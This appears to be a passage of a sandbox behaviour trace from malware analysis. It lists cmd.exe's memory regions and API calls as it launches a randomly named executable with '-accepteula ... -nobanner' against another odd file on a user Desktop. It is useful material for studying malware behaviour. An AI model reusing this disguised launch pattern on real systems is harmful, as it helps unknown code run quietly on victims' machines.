"LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9926 start_va = 0xdc0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 9927 start_va = 0xde0000 end_va = 0xde1fff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 9928 start_va = 0xdf0000 end_va = 0xe03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 9929 start_va = 0xe10000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 9930 start_va = 0xe50000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 9931 start_va = 0xf50000 end_va = 0xf53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 9932 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9933 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 9934 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9935 start_va = 0x7fc00000 end_va = 0x7fc22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fc00000" filename = "" Region: id = 9936 start_va = 0x7fc24000 end_va = 0x7fc24fff entry_point = 0x0 region_type = private name = "private_0x000000007fc24000" filename = "" Region: id = 9937 start_va = 0x7fc2a000 end_va = 0x7fc2afff entry_point = 0x0 region_type = private name = "private_0x000000007fc2a000" filename = "" Region: id = 9938 start_va = 0x7fc2d000 end_va = 0x7fc2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc2d000" filename = "" Region: id = 9939 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9940 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9941 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9942 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9943 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9944 start_va = 0xf60000 end_va = 0xf60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 9945 start_va = 0xf70000 end_va = 0xf71fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 9946 start_va = 0x1080000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 9947 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9948 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9949 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9950 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9951 start_va = 0x1090000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 9982 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9983 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9984 start_va = 0xdc0000 end_va = 0xdcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 9985 start_va = 0x7fb00000 end_va = 0x7fbfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fb00000" filename = "" Region: id = 10084 start_va = 0xf80000 end_va = 0x103dfff entry_point = 0xf80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10085 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10086 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 10087 start_va = 0x1090000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 10088 start_va = 0x11a0000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 10089 start_va = 0x12a0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 10090 start_va = 0x7fc27000 end_va = 0x7fc29fff entry_point = 0x0 region_type = private name = "private_0x000000007fc27000" filename = "" Region: id = 10091 start_va = 0xdd0000 end_va = 0xdd3fff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 10210 start_va = 0xde0000 end_va = 0xde3fff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 10231 start_va = 0x5420000 end_va = 0x5756fff entry_point = 0x5420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 995 os_tid = 0xc58 [0296.898] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0296.898] __set_app_type (_Type=0x1) [0296.898] __p__fmode () returned 0x77984d6c [0296.898] __p__commode () returned 0x77985b1c [0296.898] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0296.898] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0296.898] GetCurrentThreadId () returned 0xc58 [0296.898] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc58) returned 0x84 [0296.898] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0296.898] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0296.898] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.981] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0296.981] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf4fbf0 | out: phkResult=0xf4fbf0*=0x0) returned 0x2 [0296.981] VirtualQuery (in: lpAddress=0xf4fbf7, lpBuffer=0xf4fba8, dwLength=0x1c | out: lpBuffer=0xf4fba8*(BaseAddress=0xf4f000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.981] VirtualQuery (in: lpAddress=0xe50000, lpBuffer=0xf4fba8, dwLength=0x1c | out: lpBuffer=0xf4fba8*(BaseAddress=0xe50000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0296.981] VirtualQuery (in: lpAddress=0xe51000, lpBuffer=0xf4fba8, dwLength=0x1c | out: lpBuffer=0xf4fba8*(BaseAddress=0xe51000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0296.981] VirtualQuery (in: lpAddress=0xe53000, lpBuffer=0xf4fba8, dwLength=0x1c | out: lpBuffer=0xf4fba8*(BaseAddress=0xe53000, AllocationBase=0xe50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.981] VirtualQuery (in: lpAddress=0xf50000, lpBuffer=0xf4fba8, dwLength=0x1c | out: lpBuffer=0xf4fba8*(BaseAddress=0xf50000, AllocationBase=0xf50000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0296.981] GetConsoleOutputCP () returned 0x1b5 [0297.107] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.107] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0297.107] _get_osfhandle (_FileHandle=1) returned 0xc0 [0297.107] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0297.107] _get_osfhandle (_FileHandle=1) returned 0xc0 [0297.107] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0297.107] _get_osfhandle (_FileHandle=0) returned 0x38 [0297.107] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0297.288] GetEnvironmentStringsW () returned 0x11a7fc8* [0297.288] FreeEnvironmentStringsA (penv="=") returned 1 [0297.288] GetEnvironmentStringsW () returned 0x11a7fc8* [0297.288] FreeEnvironmentStringsA (penv="=") returned 1 [0297.288] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf4eb54 | out: phkResult=0xf4eb54*=0x94) returned 0x0 [0297.288] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x0, lpData=0xf4eb60*=0x18, lpcbData=0xf4eb5c*=0x1000) returned 0x2 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x1, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x0, lpData=0xf4eb60*=0x1, lpcbData=0xf4eb5c*=0x1000) returned 0x2 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x0, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x40, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x40, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x0, lpData=0xf4eb60*=0x40, lpcbData=0xf4eb5c*=0x1000) returned 0x2 [0297.330] RegCloseKey (hKey=0x94) returned 0x0 [0297.330] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf4eb54 | out: phkResult=0xf4eb54*=0x94) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x0, lpData=0xf4eb60*=0x40, lpcbData=0xf4eb5c*=0x1000) returned 0x2 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x1, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x0, lpData=0xf4eb60*=0x1, lpcbData=0xf4eb5c*=0x1000) returned 0x2 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x0, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x9, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x4, lpData=0xf4eb60*=0x9, lpcbData=0xf4eb5c*=0x4) returned 0x0 [0297.330] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf4eb58, lpData=0xf4eb60, lpcbData=0xf4eb5c*=0x1000 | out: lpType=0xf4eb58*=0x0, lpData=0xf4eb60*=0x9, lpcbData=0xf4eb5c*=0x1000) returned 0x2 [0297.330] RegCloseKey (hKey=0x94) returned 0x0 [0297.331] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432b1 [0297.331] srand (_Seed=0x5bb432b1) [0297.331] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner" [0297.331] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner" [0297.331] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.331] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x11a7fd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0297.331] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0297.331] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.331] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0297.331] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.331] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0297.331] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0297.331] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0297.331] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0297.331] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0297.331] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0297.331] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0297.331] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0297.331] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0297.332] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf4f92c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.332] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xf4f92c, lpFilePart=0xf4f924 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xf4f924*="Desktop") returned 0x1d [0297.332] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0297.332] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf4f6a8 | out: lpFindFileData=0xf4f6a8) returned 0x11a81e0 [0297.332] FindClose (in: hFindFile=0x11a81e0 | out: hFindFile=0x11a81e0) returned 1 [0297.332] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xf4f6a8 | out: lpFindFileData=0xf4f6a8) returned 0x11a81e0 [0297.333] FindClose (in: hFindFile=0x11a81e0 | out: hFindFile=0x11a81e0) returned 1 [0297.333] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0297.333] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xf4f6a8 | out: lpFindFileData=0xf4f6a8) returned 0x11a81e0 [0297.333] FindClose (in: hFindFile=0x11a81e0 | out: hFindFile=0x11a81e0) returned 1 [0297.333] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0297.333] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0297.333] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0297.333] GetEnvironmentStringsW () returned 0x11aa170* [0297.333] FreeEnvironmentStringsA (penv="=") returned 1 [0297.333] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.334] GetConsoleOutputCP () returned 0x1b5 [0297.365] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.365] GetUserDefaultLCID () returned 0x409 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf4fa5c, cchData=128 | out: lpLCData="0") returned 2 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf4fa5c, cchData=128 | out: lpLCData="0") returned 2 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf4fa5c, cchData=128 | out: lpLCData="1") returned 2 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0297.366] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0297.366] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0297.367] GetConsoleTitleW (in: lpConsoleTitle=0x11a8db0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.393] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0297.393] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0297.393] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0297.393] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0297.394] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0297.394] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0297.394] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0297.394] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0297.394] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0297.394] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0297.394] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0297.396] GetConsoleTitleW (in: lpConsoleTitle=0xf4f748, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.396] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0297.396] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0297.397] _wcsicmp 